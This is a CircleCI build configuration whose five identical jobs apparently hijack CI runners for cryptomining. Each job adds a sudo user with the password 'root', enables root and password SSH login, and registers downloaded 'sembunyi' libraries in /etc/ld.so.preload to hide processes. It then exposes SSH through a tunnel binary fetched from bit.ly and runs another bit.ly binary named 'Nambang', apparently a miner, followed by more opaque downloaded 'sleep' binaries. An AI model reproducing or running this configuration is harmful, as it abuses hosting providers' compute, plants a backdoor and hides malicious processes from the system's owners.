version: 2
jobs:
  build_01:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7
    steps:
      - run:
         name: Update OS & Restart Services
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" combo
          sudo su --command "adduser combo sudo && echo 'combo:root' | chpasswd"
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config && sudo service ssh restart"
      - run: 
         name: Set Hider + SSH (NGROK)
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/01.tar.gz
          sudo su --command "tar -xvf 01.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload"
          wget https://bit.ly/3sfYcY0
          chmod +x 3sfYcY0
          sudo su --command "nohup ./3sfYcY0 tcp 22 --log=stdout > sesah.log &"
          sleep 2
          sudo su --command "cat sesah.log"
      - run: 
         name: Load "Nambang"
         command: |
          wget https://bit.ly/3pd9UAZ
          chmod +x 3pd9UAZ
          sudo su --command "nohup ./3pd9UAZ --log=stdout > panik.log &"
      - run: 
         name: Sleep 01
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 02
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 03
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      
  build_02:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7
    steps:
      - run:
         name: Update OS & Restart Services
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" masbroo
          sudo su --command "adduser masbroo sudo && echo 'masbroo:root' | chpasswd"
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config && sudo service ssh restart"
      - run: 
         name: Set Hider + SSH (NGROK)
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/01.tar.gz
          sudo su --command "tar -xvf 01.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload"
          wget https://bit.ly/3sfYcY0
          chmod +x 3sfYcY0
          sudo su --command "nohup ./3sfYcY0 tcp 22 --log=stdout > sesah.log &"
          sleep 2
          sudo su --command "cat sesah.log"
      - run: 
         name: Load "Nambang"
         command: |
          wget https://bit.ly/3pd9UAZ
          chmod +x 3pd9UAZ
          sudo su --command "nohup ./3pd9UAZ --log=stdout > panik.log &"
      - run: 
         name: Sleep 01
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 02
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 03
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      
  build_03:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7
    steps:
      - run:
         name: Update OS & Restart Services
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" masbroo
          sudo su --command "adduser masbroo sudo && echo 'masbroo:root' | chpasswd"
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config && sudo service ssh restart"
      - run: 
         name: Set Hider + SSH (NGROK)
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/01.tar.gz
          sudo su --command "tar -xvf 01.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload"
          wget https://bit.ly/3sfYcY0
          chmod +x 3sfYcY0
          sudo su --command "nohup ./3sfYcY0 tcp 22 --log=stdout > sesah.log &"
          sleep 2
          sudo su --command "cat sesah.log"
      - run: 
         name: Load "Nambang"
         command: |
          wget https://bit.ly/3pd9UAZ
          chmod +x 3pd9UAZ
          sudo su --command "nohup ./3pd9UAZ --log=stdout > panik.log &"
      - run: 
         name: Sleep 01
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 02
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 03
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      
  build_04:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7
    steps:
      - run:
         name: Update OS & Restart Services
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" masbroo
          sudo su --command "adduser masbroo sudo && echo 'masbroo:root' | chpasswd"
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config && sudo service ssh restart"
      - run: 
         name: Set Hider + SSH (NGROK)
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/01.tar.gz
          sudo su --command "tar -xvf 01.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload"
          wget https://bit.ly/3sfYcY0
          chmod +x 3sfYcY0
          sudo su --command "nohup ./3sfYcY0 tcp 22 --log=stdout > sesah.log &"
          sleep 2
          sudo su --command "cat sesah.log"
      - run: 
         name: Load "Nambang"
         command: |
          wget https://bit.ly/3pd9UAZ
          chmod +x 3pd9UAZ
          sudo su --command "nohup ./3pd9UAZ --log=stdout > panik.log &"
      - run: 
         name: Sleep 01
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 02
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 03
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
          
  build_05:
    parallelism: 6
    docker:
      - image: cimg/go:1.17.7
    steps:
      - run:
         name: Update OS & Restart Services
         command: |
          sudo apt-get update
          sudo apt-get install ssh gcc -y
          sudo adduser --disabled-password --gecos "" masbroo
          sudo su --command "adduser masbroo sudo && echo 'masbroo:root' | chpasswd"
          sudo su --command "echo 'Port 22' >> /etc/ssh/sshd_config && echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && echo 'PasswordAuthentication yes' >> /etc/ssh/sshd_config && sudo service ssh restart"
      - run: 
         name: Set Hider + SSH (NGROK)
         command: |
          wget https://github.com/p4n1k/mnr/releases/download/sembunyi/01.tar.gz
          sudo su --command "tar -xvf 01.tar.gz && cd 01 && make && sudo mv libsembunyi01.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi01.so >> /etc/ld.so.preload && cd 02 && make && sudo mv libsembunyi02.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi02.so >> /etc/ld.so.preload && cd 03 && make && sudo mv libsembunyi03.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi03.so >> /etc/ld.so.preload && cd 04 && make && sudo mv libsembunyi04.so /usr/local/lib/ && echo /usr/local/lib/libsembunyi04.so >> /etc/ld.so.preload"
          wget https://bit.ly/3sfYcY0
          chmod +x 3sfYcY0
          sudo su --command "nohup ./3sfYcY0 tcp 22 --log=stdout > sesah.log &"
          sleep 2
          sudo su --command "cat sesah.log"
      - run: 
         name: Load "Nambang"
         command: |
          wget https://bit.ly/3pd9UAZ
          chmod +x 3pd9UAZ
          sudo su --command "nohup ./3pd9UAZ --log=stdout > panik.log &"
      - run: 
         name: Sleep 01
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 02
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
      - run: 
         name: Sleep 03
         command: |
          wget https://bit.ly/3LVldHF
          chmod +x 3LVldHF
          sudo su --command "./3LVldHF"
workflows:
    version: 2
    build:
        jobs:
            - build_01
            - build_02
            - build_03
            - build_04
            - build_05